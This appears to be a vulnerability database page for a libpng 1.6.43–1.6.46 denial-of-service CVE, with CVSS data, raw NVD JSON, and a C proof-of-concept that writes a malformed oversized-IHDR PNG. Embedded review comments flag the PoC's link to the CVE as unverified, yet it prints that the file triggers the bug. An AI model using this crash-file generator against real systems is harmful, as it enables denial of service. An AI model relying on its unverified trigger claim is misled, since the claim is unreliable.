Security Vulnerability Report
CVE-2025-28164 CVSS 5.5 MEDIUM

CVE-2025-28164

Published: 2026-01-27 16:16:15
Last Modified: 2026-03-04 19:42:08

Description

Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE
libpng 1.6.43
libpng 1.6.44
libpng 1.6.45
libpng 1.6.46

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
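#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * PoC published alongside CVE-2025-28164 (libpng 1.6.43-1.6.46,
 * png_create_read_struct()).
 *
 * What the program does: writes a three-part file (PNG signature, one IHDR
 * chunk declaring 0x7FFFFFFF x 0x7FFFFFFF pixels, one IEND chunk) to the path
 * given on the command line. It never calls libpng itself.
 *
 * NOTE(review): the link between this file and the CVE is unverified.
 *  - png_create_read_struct() takes a version string and error callbacks, not
 *    image data, so nothing in this listing shows how the generated file would
 *    reach that function.
 *  - The CVE record lists CWE-401 as the primary weakness and CWE-120 as
 *    secondary, so the record itself does not settle which defect class is
 *    meant.
 *  - Multi-byte fields are written in host byte order, while PNG stores them
 *    most-significant byte first. On a little-endian host a decoder is
 *    expected to reject the chunk length/CRC before it looks at dimensions.
 * A decoder rejecting this file is therefore not evidence that a build is
 * patched; use the version range in the advisory for exposure decisions.
 */

/* push/pop keeps the 1-byte packing from leaking into later declarations. */
#pragma pack(push, 1)
/* In-memory view of an IHDR chunk: length, type, 13 data bytes, CRC. */
typedef struct {
    unsigned int length;
    char type[4];
    unsigned int width;
    unsigned int height;
    unsigned char bit_depth;
    unsigned char color_type;
    unsigned char compression;
    unsigned char filter;
    unsigned char interlace;
    unsigned int crc;
} ihdr_chunk_t;
#pragma pack(pop)

/* Write the fixed 8-byte PNG signature to fp. */
void write_png_header(FILE *fp)
{
    static const unsigned char signature[8] = {
        0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A
    };

    fwrite(signature, 1, sizeof signature, fp);
}

/*
 * Bitwise CRC-32 (reflected polynomial 0xEDB88320, initial value and final
 * XOR of 0xFFFFFFFF) over data[0..length-1].
 *
 * Returns the 32-bit checksum; a length <= 0 yields the CRC of empty input.
 */
unsigned int calculate_crc32(unsigned char *data, int length)
{
    unsigned int crc = 0xFFFFFFFFu;

    for (int i = 0; i < length; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++) {
            /* -(crc & 1) is all-ones when the low bit is set, else zero. */
            crc = (crc >> 1) ^ (0xEDB88320u & -(crc & 1u));
        }
    }
    /* Mask so the result stays 32 bits even if unsigned int is wider. */
    return ~crc & 0xFFFFFFFFu;
}

/*
 * Write one IHDR chunk (length, type, 13 data bytes, CRC) to fp.
 *
 * Width and height are both 0x7FFFFFFF; the original author labels these as
 * the overflow trigger, which this listing does not demonstrate.
 * NOTE(review): length, width, height and crc go out in host byte order.
 */
void write_malformed_ihdr(FILE *fp)
{
    ihdr_chunk_t ihdr;
    unsigned char ihdr_data[17]; /* chunk type (4) + IHDR data (13) */

    ihdr.length = 13; /* IHDR data length */
    memcpy(ihdr.type, "IHDR", 4);
    ihdr.width = 0x7FFFFFFF;
    ihdr.height = 0x7FFFFFFF;
    ihdr.bit_depth = 8;
    ihdr.color_type = 2; /* RGB */
    ihdr.compression = 0;
    ihdr.filter = 0;
    ihdr.interlace = 0;

    /* Serialise type + data once; the CRC covers exactly these bytes. */
    memcpy(ihdr_data, ihdr.type, 4);
    memcpy(ihdr_data + 4, &ihdr.width, 4);
    memcpy(ihdr_data + 8, &ihdr.height, 4);
    ihdr_data[12] = ihdr.bit_depth;
    ihdr_data[13] = ihdr.color_type;
    ihdr_data[14] = ihdr.compression;
    ihdr_data[15] = ihdr.filter;
    ihdr_data[16] = ihdr.interlace;
    ihdr.crc = calculate_crc32(ihdr_data, (int)sizeof ihdr_data);

    /*
     * Emit the serialised buffer rather than reading 5 bytes through a
     * pointer to the 1-byte bit_depth member: same bytes on disk, but no
     * dependence on struct packing and no read past the named object.
     */
    fwrite(&ihdr.length, 4, 1, fp);
    fwrite(ihdr_data, 1, sizeof ihdr_data, fp);
    fwrite(&ihdr.crc, 4, 1, fp);
}

/*
 * Write a zero-length IEND chunk to fp.
 * NOTE(review): the CRC constant is written in host byte order.
 */
void write_iend(FILE *fp)
{
    unsigned int length = 0;
    unsigned int crc = 0xAE426082; /* CRC of "IEND" */

    fwrite(&length, 4, 1, fp);
    fwrite("IEND", 4, 1, fp);
    fwrite(&crc, 4, 1, fp);
}

/*
 * Usage: <program> <output_png_file>
 * Returns 0 on success, 1 on bad usage or any I/O failure.
 */
int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("Usage: %s <output_png_file>\n", argv[0]);
        return 1;
    }

    FILE *fp = fopen(argv[1], "wb");
    if (!fp) {
        perror("Failed to open output file");
        return 1;
    }

    write_png_header(fp);
    write_malformed_ihdr(fp);
    write_iend(fp);

    /* The writers return void, so pick up any short write from the stream. */
    if (ferror(fp)) {
        perror("Failed to write output file");
        fclose(fp);
        return 1;
    }
    /* fclose flushes buffered data; a failure here means the file is incomplete. */
    if (fclose(fp) != 0) {
        perror("Failed to close output file");
        return 1;
    }

    printf("Malformed PNG created: %s\n", argv[1]);
    /* NOTE(review): this message repeats the page's claim; it is not verified here. */
    printf("This file triggers CVE-2025-28164 in libpng versions 1.6.43-1.6.46\n");
    return 0;
}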

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-28164", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.760", "lastModified": "2026-03-04T19:42:07.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function."}, {"lang": "es", "value": "Vulnerabilidad de desbordamiento de búfer en libpng 1.6.43-1.6.46 permite a un atacante local causar una denegación de servicio a través de la función png_create_read_struct()."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.43", "versionEndIncluding": "1.6.46", "matchCriteriaId": "A0F7AAC0-79B6-4C89-A7F1-E61C24B0A5A7"}]}]}], "references": [{"url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/pnggroup/libpng/issues/655", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}